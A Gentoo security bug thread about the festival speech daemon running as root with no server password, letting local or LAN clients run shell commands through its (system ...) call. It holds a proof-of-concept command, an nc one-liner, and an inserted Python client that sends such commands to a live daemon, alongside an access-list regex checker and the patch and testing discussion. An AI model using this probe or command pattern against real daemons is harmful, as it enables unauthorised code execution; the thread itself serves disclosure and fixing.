Bug 170477 - app-accessibility/festival: privilege elevation with current default setup

Bug#: 170477
Product: Gentoo Security
Version: unspecified
Platform: All
OS/Version: Linux
Status: RESOLVED
Severity: major
Priority: P2
Resolution: FIXED
Assigned To: security@gentoo.org
Reported By: shirow@project7.ru
Component: Default Configs
Summary: app-accessibility/festival: privilege elevation with current default setup
Status Whiteboard: B1 [glsa] Falco

Opened: 2007-03-11 20:10 0000
|
Festival as it is currently set up by portage when installed runs under the
root user. If a festival daemon setup is used, the default server password is
nil, i.e. absent.
When the daemon is running, anyone who can connect to the festival daemon at
the normal TCP port can issue the '(system "<whatever>")' command, which will
execute with root privileges. The default configuration denies connections from
anywhere but localhost, but local users can connect and execute commands as
root regardless.
Reproducible: Always
Steps to Reproduce:
Using the festival_client.pl provided in /usr/share/doc/festival-*/, connect to
your localhost festival daemon as a non-root user, and enter the command
(system "whoami > /tmp/amiroot")
then exit the client and
cat /tmp/amiroot
There are several approaches to fixing this, but giving the daemon its own user
account seems the best approach.
thanks for your report. CCing maintainer
adding herds
please comment/fix, since jeeves has not seen williamh for 20 days
Herds please advise and provide an updated ebuild as necessary.
Herds/Maintainer please advise
Created an attachment (id=121219)
festival-bug-170477.diff
How about something like this? Run it as its own user and set its shell to
/bin/false.
solar@here $ echo '(system "whoami > /tmp/amiroot")' | busybox nc localhost 1314
LP
nil
ft_StUfF_keyOK
solar@here $ cat /tmp/amiroot
festival
I don't know if the 'system' command can/should/could be disabled altogether
or if there is a better alternative but this meets the initial
poster's suggestion.
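To make the check from the original report and from the nc session above repeatable, here is an added Python example; it is not code from this bug or from the festival project. It builds the same `(system ...)` request, parses the daemon's reply using the `ft_StUfF_key` + `OK` terminator visible in the transcript, and, when pointed at a live daemon, asks it to record the user it runs as. The port 1314, the marker path and the `id -un` command are assumptions; `probe()` needs a running daemon and is the only part that is not exercised offline.

```python
import socket

# Reply terminator used by the festival server; it appears in the nc
# transcript above as the line "ft_StUfF_keyOK".
FT_KEY = "ft_StUfF_key"

# Constructed sample: the reply the nc session above received for (system ...).
SAMPLE_REPLY = b"LP\nnil\nft_StUfF_keyOK\n"


def festival_command(shell_cmd):
    """Build the Scheme request that makes the daemon run shell_cmd via system."""
    escaped = shell_cmd.replace("\\", "\\\\").replace('"', '\\"')
    return ('(system "%s")\n' % escaped).encode()


def parse_reply(raw):
    """Split one server reply into (status, payload).

    status is "LP" (a Lisp value follows), "WV" (waveform data follows) or
    "ER" (error, nothing follows).  Payload replies end with FT_KEY then "OK".
    """
    text = raw.decode("utf-8", errors="replace")
    status, _, rest = text.partition("\n")
    status = status.strip()
    if status == "ER":
        return status, rest.strip()
    body, key, tail = rest.partition(FT_KEY)
    if not key or not tail.startswith("OK"):
        raise ValueError("truncated or unterminated reply: %r" % raw)
    return status, body.strip()


def read_reply(sock):
    """Read from sock until one complete reply (terminator or ER) has arrived."""
    terminator = (FT_KEY + "OK").encode()
    buf = b""
    while True:
        chunk = sock.recv(4096)
        if not chunk:
            break
        buf += chunk
        if buf.startswith(b"ER") or terminator in buf:
            break
    return buf


def probe(host="localhost", port=1314, marker="/tmp/festival-probe", timeout=5.0):
    """Ask a live daemon to write its effective user name into marker.

    Assumptions: the daemon listens on host:port and no server password is set
    (the default this bug is about).  Afterwards `cat marker` shows "root" on an
    unfixed install and the unprivileged service user once the fix is in.
    """
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(festival_command("id -un > %s" % marker))
        return parse_reply(read_reply(sock))


if __name__ == "__main__":
    print(festival_command("whoami > /tmp/amiroot").decode(), end="")
    print(parse_reply(SAMPLE_REPLY))
```

Because the default server password is nil, no authentication step precedes the command; the only gate is the host access list, which is why running the daemon as an unprivileged user limits the damage rather than the reachability.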
(In reply to comment #9)
> I don't know if the 'system' command can/should/could be disabled altogether
> or if there is a better alternative but this meets the initial
> poster's suggestion.
It shouldn't be disabled altogether because festival extensively uses it
internally (for example, it is required to use mbrola voices). Also, I think
I've seen several code examples which involve using it from the client to play
the speech festival generates, so you probably can't prevent the client from
using it without breaking stuff. But it definitely doesn't have to be root. :)
Adding the festival user to the audio group in the ebuild would be a good idea,
by the way.
(In reply to comment #9)
> Created an attachment (id=121219)
> festival-bug-170477.diff
>
> How about something like this? Run it as its own user and set its shell to
> /bin/false.
It still doesn't stop one from wgetting, building and running shellcode which opens
a backdoor to experiment with local exploits to gain root privileges..
> It still doesn't stop one from wgetting, building and running shellcode which opens
> a backdoor to experiment with local exploits to gain root privileges..
Considering that connections are only allowed from localhost in the default
configuration, you have to be a local user already to do that, or am I missing
something?
(In reply to comment #10)
> Adding the festival user to the audio group in the ebuild would be a good idea,
> by the way.
Can you please attach an updated diff.
cvs -d :pserver:anonymous@anoncvs.gentoo.org:/var/cvsroot \
co gentoo-x86/app-accessibility/festival
...
cvs diff -u > foo.diff
> Can you please attach an updated diff.
If I knew enough portage, I'd post a diff with that instead of just a bug
report in the first place. :)
Oh, almost forgot, just noticed this. The server.scm configuration file that
comes with the ebuild actually contains:
; Server access list (hosts)
(set! server_access_list '("[^.]+" "127.0.0.1" "localhost.*" "192.168.*"))
If 192.168.* is allowed, and you can (system "<whatever>") from a different
machine, the argument about using festival to try local exploits still stands.
Maybe adding a warning to set a server password if you plan to connect to
festival remotely is also in order.
(In reply to comment #15)
> Oh, almost forgot, just noticed this. The server.scm configuration file that
> comes with the ebuild actually contains:
>
> ; Server access list (hosts)
> (set! server_access_list '("[^.]+" "127.0.0.1" "localhost.*" "192.168.*"))
>
Question:
Would that regexp currently allow remote exec of the "system" command with
a domain such as localhost.is.a.myth.gentoo.org ?
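Working through that question with an added Python example (not from the bug or from the festival sources): it evaluates the default server_access_list quoted above against a few constructed client names. It assumes, and this should be checked against the server code of your festival version, that each entry is a regular expression matched against the whole name festival derives for the client. STRICT_ACCESS_LIST, with the dots escaped, is a suggested replacement and not something the bug proposes.

```python
import re

# The default list quoted from the ebuild's server.scm.
DEFAULT_ACCESS_LIST = ["[^.]+", "127.0.0.1", "localhost.*", "192.168.*"]

# Suggested replacement (an assumption, not from the bug): literal dots escaped,
# loopback only.  Remote clients then need an explicit entry plus a server password.
STRICT_ACCESS_LIST = [r"localhost", r"127\.0\.0\.1"]


def is_allowed(client_name, access_list):
    """True if any entry matches the entire client name (assumed festival semantics)."""
    return any(re.fullmatch(pattern, client_name) is not None for pattern in access_list)


def review(access_list, client_names):
    """Map each client name to its access decision, for eyeballing a list."""
    return {name: is_allowed(name, access_list) for name in client_names}


CLIENT_NAMES = [  # constructed names, not taken from any real host
    "localhost",
    "127.0.0.1",
    "localhost.is.a.myth.gentoo.org",  # the name asked about above
    "192.168.0.7",
    "192x168y",   # unescaped dots in "192.168.*" match any character
    "attacker",   # no dot at all: accepted by "[^.]+"
    "10.0.0.5",
]

if __name__ == "__main__":
    for label, acl in (("default", DEFAULT_ACCESS_LIST), ("strict", STRICT_ACCESS_LIST)):
        for name, ok in review(acl, CLIENT_NAMES).items():
            print("%-7s %-32s %s" % (label, name, "allowed" if ok else "denied"))
```

With the default list, "localhost.*" accepts any client name that merely starts with localhost, "[^.]+" accepts any dot-free name, and the unescaped dots in "192.168.*" and "127.0.0.1" accept names such as 192x168y. Whether a remote host can present such a name depends on how festival derives it (reverse DNS is the usual source), which is exactly why a server password is the control to rely on for any non-loopback access.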
That patch sounds good to me even though it is only a poor workaround.
Sound herd: someone wants to commit it into the tree or can we commit it
ourselves?
I am looking at committing this tonight or tomorrow.
Thanks.
I have found one issue with this patch so far. The festival server can create
a log, and by default that goes to /var/log/festival.log. That does not work
if festival is running as a user other than root since /var/log is read-only to
any other user. Any suggestions?
(In reply to comment #20)
> I have found one issue with this patch so far. The festival server can create
> a log, and by default that goes to /var/log/festival.log. That does not work
> if festival is running as a user other than root since /var/log is read-only to
> any other user. Any suggestions?
Things like apache, clamav, lighttpd, mysql, snort and squid all use a subdir in
/var/log/ that is owned by that user. So you want
/var/log/festival/festival.log
The fix for this has been committed to the tree. I'm not sure whether I can
close this or if I should wait for the security team to check it. Please
advise.
Thx William, now it's time for arches.
Arches please test and mark stable. Target keywords are:
festival-1.95_beta-r4.ebuild:KEYWORDS="alpha amd64 hppa ia64 ppc ppc64 sparc
x86"
app-accessibility/festival-1.95_beta-r4 USE="X asterisk -esd -mbrola"
1. emerges on x86
2. passes collision test
3. app-accessibility/gnome-speech-0.4.11 emerges with it
4. works
Portage 2.1.2.7 (default-linux/x86/2007.0/desktop, gcc-4.1.2, glibc-2.5-r3,
2.6.20.12 i686)
=================================================================
System uname: 2.6.20.12 i686 Genuine Intel(R) CPU T2300 @ 1.66GHz
Gentoo Base System release 1.12.9
Timestamp of tree: Sat, 09 Jun 2007 09:00:01 +0000
dev-java/java-config: 1.3.7, 2.0.32
dev-lang/python: 2.3.5-r3, 2.4.4-r4
dev-python/pycrypto: 2.0.1-r5
sys-apps/sandbox: 1.2.17
sys-devel/autoconf: 2.13, 2.61
sys-devel/automake: 1.4_p6, 1.5, 1.6.3, 1.7.9-r1, 1.8.5-r3, 1.9.6-r2, 1.10
sys-devel/binutils: 2.16.1-r3
sys-devel/gcc-config: 1.3.16
sys-devel/libtool: 1.5.22
virtual/os-headers: 2.6.17-r2
ACCEPT_KEYWORDS="x86"
AUTOCLEAN="yes"
CBUILD="i686-pc-linux-gnu"
CFLAGS="-O2 -march=prescott -pipe -fomit-frame-pointer"
CHOST="i686-pc-linux-gnu"
CONFIG_PROTECT="/etc /usr/kde/3.5/env /usr/kde/3.5/share/config
/usr/kde/3.5/shutdown /usr/share/X11/xkb /usr/share/config"
CONFIG_PROTECT_MASK="/etc/env.d /etc/env.d/java/ /etc/gconf
/etc/php/apache2-php5/ext-active/ /etc/php/cgi-php5/ext-active/
/etc/php/cli-php5/ext-active/ /etc/revdep-rebuild /etc/terminfo
/etc/texmf/web2c"
CXXFLAGS="-O2 -march=prescott -pipe -fomit-frame-pointer"
DISTDIR="/usr/portage/distfiles"
EMERGE_DEFAULT_OPTS="--nospinner"
FEATURES="collision-protect distlocks metadata-transfer parallel-fetch sandbox
sfperms strict test userfetch userpriv usersandbox"
GENTOO_MIRRORS="http://mirror.switch.ch/mirror/gentoo/ http://gentoo.inode.at/"
LINGUAS="en de en_GB de_CH"
MAKEOPTS="-j3"
PKGDIR="/usr/portage/packages"
PORTAGE_RSYNC_OPTS="--recursive --links --safe-links --perms --times --compress
--force --whole-file --delete --delete-after --stats --timeout=180
--exclude=/distfiles --exclude=/local --exclude=/packages
--filter=H_**/files/digest-*"
PORTAGE_TMPDIR="/var/tmp"
PORTDIR="/usr/portage"
SYNC="rsync://rsync.gentoo.org/gentoo-portage"
USE="X a52 aac acl acpi alsa apache2 asf avahi berkdb bitmap-fonts cairo cdr
cdrom cli cracklib crypt cups dbus divx dri dts dvd dvdr dvdread eds emboss
encode evo fam ffmpeg firefox flac fortran gdbm gif gnome gpm gstreamer gtk hal
iconv ipv6 isdnlog java jpeg kde kdeenablefinal kerberos ldap libg++ mad midi
mikmod mmx mono mp3 mpeg mudflap ncurses nls nptl nptlonly ogg opengl openmp
oss pam pcre pdf perl png pppd python qt3 qt3support qt4 quicktime readline
reflection rtsp ruby samba sdl session smp spell spl sse sse2 sse3 ssl svg tcpd
test tetex theora threads tiff truetype truetype-fonts type1-fonts unicode vcd
vorbis wifi win32codecs wxwindows x264 x86 xine xml xorg xprint xv xvid zlib"
ELIBC="glibc" INPUT_DEVICES="keyboard mouse" KERNEL="linux" LINGUAS="en de
en_GB de_CH" USERLAND="GNU" VIDEO_CARDS="i810 fbdev vesa"
Unset: CTARGET, INSTALL_MASK, LANG, LC_ALL, LDFLAGS, PORTAGE_COMPRESS,
PORTAGE_COMPRESS_FLAGS, PORTAGE_RSYNC_EXTRA_OPTS, PORTDIR_OVERLAY
Testing festival-1.95_beta-r4
1. Emerges fine
2. Passes collision
3. Works fine
4. no security hole with test case
$ emerge --info
Portage 2.1.2.7 (default-linux/alpha/2007.0, gcc-4.1.2, glibc-2.5-r2,
2.6.21-gentoo-r1 alpha)
=================================================================
System uname: 2.6.21-gentoo-r1 alpha EV56
Gentoo Base System release 1.12.9
Timestamp of tree: Sat, 09 Jun 2007 14:20:01 +0000
distcc 2.18.3 alpha-unknown-linux-gnu (protocols 1 and 2) (default port 3632)
[enabled]
ccache version 2.4 [enabled]
dev-lang/python: 2.4.4-r4
dev-python/pycrypto: 2.0.1-r5
dev-util/ccache: 2.4-r7
sys-apps/sandbox: 1.2.18.1
sys-devel/autoconf: 2.13, 2.61
sys-devel/automake: 1.4_p6, 1.5, 1.6.3, 1.7.9-r1, 1.8.5-r3, 1.9.6-r2, 1.10
sys-devel/binutils: 2.17.50.0.16
sys-devel/gcc-config: 1.3.15-r1
sys-devel/libtool: 1.5.22
virtual/os-headers: 2.6.17-r2
ACCEPT_KEYWORDS="alpha"
AUTOCLEAN="yes"
CBUILD="alpha-unknown-linux-gnu"
CFLAGS="-mieee -pipe -O2 -mcpu=ev56"
CHOST="alpha-unknown-linux-gnu"
CONFIG_PROTECT="/etc /usr/share/X11/xkb /var/bind"
CONFIG_PROTECT_MASK="/etc/env.d /etc/gconf /etc/revdep-rebuild /etc/splash
/etc/terminfo"
CXXFLAGS="-mieee -pipe -O2 -mcpu=ev56"
DISTDIR="/usr/portage/distfiles"
FEATURES="ccache collision-protect distcc distlocks metadata-transfer
parallel-fetch sandbox sfperms strict test"
GENTOO_MIRRORS="http://distfiles.gentoo.org
http://distro.ibiblio.org/pub/linux/distributions/gentoo"
LINGUAS="en"
MAKEOPTS="-j3"
PKGDIR="/usr/portage/packages"
PORTAGE_RSYNC_OPTS="--recursive --links --safe-links --perms --times --compress
--force --whole-file --delete --delete-after --stats --timeout=180
--exclude=/distfiles --exclude=/local --exclude=/packages
--filter=H_**/files/digest-*"
PORTAGE_TMPDIR="/var/tmp"
PORTDIR="/usr/portage"
PORTDIR_OVERLAY="/usr/portage/local/overlay"
SYNC="rsync://eldest/gentoo-portage"
USE="X acl alpha alsa berkdb bitmap-fonts bzip2 cli cracklib crypt cups curl
dri fortran gdbm gpm iconv ipv6 isdnlog ldap libg++ logrotate midi mudflap
ncurses nls nptl nptlonly openmp pam pcre perl postfix pppd python readline
reflection session spl sqlite ssl startup-notification tcpd test truetype-fonts
type1-fonts unicode xorg zlib" ALSA_CARDS="au8810" ALSA_PCM_PLUGINS="adpcm alaw
asym copy dmix dshare dsnoop empty extplug file hooks iec958 ioplug ladspa
lfloat linear meter mulaw multi null plug rate route share shm softvol"
ELIBC="glibc" INPUT_DEVICES="evdev keyboard mouse joystick" KERNEL="linux"
LCD_DEVICES="bayrad cfontz cfontz633 glk hd44780 lb216 lcdm001 mtxorb ncurses
text" LINGUAS="en" USERLAND="GNU" VIDEO_CARDS="vga s3virge nv cirrus"
Unset: CTARGET, EMERGE_DEFAULT_OPTS, INSTALL_MASK, LANG, LC_ALL, LDFLAGS,
PORTAGE_COMPRESS, PORTAGE_COMPRESS_FLAGS, PORTAGE_RSYNC_EXTRA_OPTS
x86 stable, thanks Markus.
ia64 is there something wrong with stabilization?
ia64 is not security supported :)
Plus i can't test it
it's GLSA 200707-10, thanks